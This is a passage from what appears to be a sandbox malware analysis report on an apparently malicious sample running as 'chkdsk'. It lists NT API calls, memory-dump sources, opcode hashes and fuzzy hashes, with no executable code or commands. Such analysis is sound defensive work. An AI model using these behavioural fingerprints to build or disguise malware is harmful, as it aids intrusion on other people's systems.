                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                • Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                                                                                                                                • Instruction ID: 866be653a6b0120b45e71c6bd25f304a902742115293571a0f8ff8da9b2aeb1c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 493152B1900308BBDB20DF65CC85FEB777DEF84B14F148559BA49E6181D670EA848BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008885E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00883BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00883BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0088862D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                                • Instruction ID: 484c37b9fbaa4b97d70c9854e4d803a8e02f8219824736d660d1caaa141afceb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0BDB2204208ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0088868A Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtReadFile.NTDLL(00883D72,5E972F65,FFFFFFFF,00883A31,?,?,00883D72,?,00883A31,FFFFFFFF,5E972F65,00883D72,?,00000000), ref: 008886D5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                                                                                                                                                                                                • Instruction ID: 6df496299a91cce28b1ef261cc2acf88f76a3de04cf378a5077b678c0781d131
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF0F4B6214108AFCB14DF89DC84EEB77A9FF8C754F158249FA5DA7241D630E911CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00888690 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtReadFile.NTDLL(00883D72,5E972F65,FFFFFFFF,00883A31,?,?,00883D72,?,00883A31,FFFFFFFF,5E972F65,00883D72,?,00000000), ref: 008886D5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                                • Instruction ID: ac242117f4c3218d1cc05c3142e8b7e0b08c8f5ef65bdf7a3103c14281310c29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0A4B6204208ABCB14DF8DDC85EEB77ADEF8C754F158249FA1D97241D630E911CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008887C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00872D11,00002000,00003000,00000004), ref: 008887F9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                                • Instruction ID: 16b7b75467848561edc14a2560d49a823b2dd64f6a5ab7ce728517bccdf45a88
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F015B6204208ABCB14DF89CC85EAB77ADEF88750F158149FE0997241C630F910CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0088870A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtClose.NTDLL(00883D50,?,?,00883D50,00000000,FFFFFFFF), ref: 00888735
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                • Opcode ID: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                                                                                                                                                                                                • Instruction ID: 1959abef81487fb484dc12b3a60f0586c00e6da41477a1a716c30c2b577605a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42E08C762082106BE710EBA88C49EEB7B28EF44250F1444A9F98D9B242C230E600C7A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00888710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtClose.NTDLL(00883D50,?,?,00883D50,00000000,FFFFFFFF), ref: 00888735
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                                • Instruction ID: 429354b2f750d8dbcb58ab4eab74804161b8d024c2f2ae3b1ea741823f2585a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AD01776204214ABD710EB98CC89EAB7BACEF48B60F154499FA599B242C530FA00C7E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 054634E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 2a13d2ac1264977db4f87e68920e96c812a191c6fc8ad5c7d071859f1303f6f6
                                                                                                                                                                                                                                • Instruction ID: 3714af8392865d6a3a21d1f53905f8d42f38d332341d0d7fdbd2ec4024e492c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a13d2ac1264977db4f87e68920e96c812a191c6fc8ad5c7d071859f1303f6f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA90023160510802D60061584658786201587D0201FA2C816A0515568DD7A5895175A2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 24b434ddb110af766ad2dd0c3dad17af5cd2cda6e149d7708ac688c59f484684
                                                                                                                                                                                                                                • Instruction ID: 00b7bfeeb166e8061c2c5833da929d84055fb5cadb8c2d9c3b91056614a8d5ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24b434ddb110af766ad2dd0c3dad17af5cd2cda6e149d7708ac688c59f484684
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E90023120100813D61161584648787101987D0241FD2C817A0515558DE7668952B121
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 37e7eafe8dae3b9f3c6c624ab9ae110fc8fab86744dbff6109877db767e17622
                                                                                                                                                                                                                                • Instruction ID: c04a1f4cad3b231a72da5290ad2d92cb418f4427ca74efc1b2927513fb182b51
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37e7eafe8dae3b9f3c6c624ab9ae110fc8fab86744dbff6109877db767e17622
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD90027120100802D640715845487C6101587D0301F92C416A5155554ED7698DD57665
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: fc0fc6087c8676e410337a1de09eb458e8f11f0e89f881586cfd1cfbc4b35435
                                                                                                                                                                                                                                • Instruction ID: 02cf4368cf169f0ca2172d63a4e6bbc718a4a7f3f11793fdfbc33f18e80d880f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc0fc6087c8676e410337a1de09eb458e8f11f0e89f881586cfd1cfbc4b35435
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF90023921300402D6807158554C68A101587D1202FD2D81AA0106558CDA2588696321
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 3ecbed879343f9e74948cb7bacb7961a87528dfaec0a278689670866c3baf0e7
                                                                                                                                                                                                                                • Instruction ID: 786f9dc79ee85fa180d9e6a48d97ade0e5c237456b2347312482183e402d3317
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ecbed879343f9e74948cb7bacb7961a87528dfaec0a278689670866c3baf0e7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41900231242045525A45B1584548587501697E0241BD2C417A1505950CD6369856E621
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 4c7ebcfa3cf2ba0c1067543c87198356f67fc1a80401798a9771699b1487b30d
                                                                                                                                                                                                                                • Instruction ID: c9ac0034501e2d280539e9b9f9341f7646133566fa536bc735643e24a465e8b5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c7ebcfa3cf2ba0c1067543c87198356f67fc1a80401798a9771699b1487b30d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E90023121180442D70065684D58B87101587D0303F92C51AA0245554CDA2588616521
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: deea95b7cc2b7ccef63cb804a556c1181adcb037381d4c3b5ed540e7c99e6f55
                                                                                                                                                                                                                                • Instruction ID: 5dadeed172bde55972c398ebc89c9917c815b2564585218084d48e7377eeae1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: deea95b7cc2b7ccef63cb804a556c1181adcb037381d4c3b5ed540e7c99e6f55
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6090023124100C02D640715885587871016C7D0601F92C416A0115554DD726896576B1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 17b24a35f05d18cd3be1182a402db0fe2bf095580da3818bddbfbc504e094c4e
                                                                                                                                                                                                                                • Instruction ID: 43782f85ec412143717ea0f82534e95f82eef27dd05ad6015ae66da0f2556335
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17b24a35f05d18cd3be1182a402db0fe2bf095580da3818bddbfbc504e094c4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF90027134100842D60061584558B861015C7E1301F92C41AE1155554DD729CC527126
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 054629F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: fa9efdad813438897f562d617b86dbf3290e314bcf9d8889fd3ce32434851561
                                                                                                                                                                                                                                • Instruction ID: c4b40e49ba5d2f4b1db8dca009a2e447a5177b5a9cdda61d595e3806b0ace0c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa9efdad813438897f562d617b86dbf3290e314bcf9d8889fd3ce32434851561
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39900235211004030605A5580748587105687D5351792C426F1106550CE73188616121
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 1e4520d5df5197a2ec7546ff09e809dfa67327902ebb5ff5409f1f299dd2d474
                                                                                                                                                                                                                                • Instruction ID: 29d769711d4693b90794360c35176abfdc7ffa598e5280394017243255569622
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e4520d5df5197a2ec7546ff09e809dfa67327902ebb5ff5409f1f299dd2d474
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4690023120504C42D64071584548AC6102587D0305F92C416A0155694DE7358D55B661
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 1538acc908e36c7a492c6febcb7a4375823e8138130391347f5b752cf69f62c5
                                                                                                                                                                                                                                • Instruction ID: 699f0c77c2263f0b3ca6cddf882db927282f01d3302813bb09d86dbe541723d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1538acc908e36c7a492c6febcb7a4375823e8138130391347f5b752cf69f62c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D490023120100C02D680715845486CA101587D1301FD2C41AA0116654DDB258A5977A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 9ef471dfb2e2e78ea95e5c874dd2ed0b06c78ce6ae25ea6b73fdd55f919cabc2
                                                                                                                                                                                                                                • Instruction ID: d9fcccd56ac6da6105e5bc99f3cf1cf9f285f0ddfdac0d32ec91b9038a2bac01
